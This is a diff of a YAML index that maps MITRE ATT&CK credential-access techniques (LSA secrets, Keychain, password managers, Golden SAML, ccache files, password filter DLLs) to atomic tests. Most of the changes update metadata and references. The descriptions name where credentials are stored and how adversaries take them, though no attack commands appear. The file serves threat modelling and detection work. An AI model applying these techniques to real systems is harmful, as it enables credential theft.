-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -45124,7 +45777,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -45141,10 +45794,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45168,46 +45821,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -45228,65 +45847,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -45295,6 +45911,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -45302,31 +45921,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -45339,14 +45990,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -45387,9 +46038,6 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests:
     - name: Golden SAML
@@ -45435,7 +46083,7 @@ credential-access:
         name: powershell
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -45498,81 +46146,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -45657,12 +46303,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -45711,38 +46356,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -45766,76 +46386,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
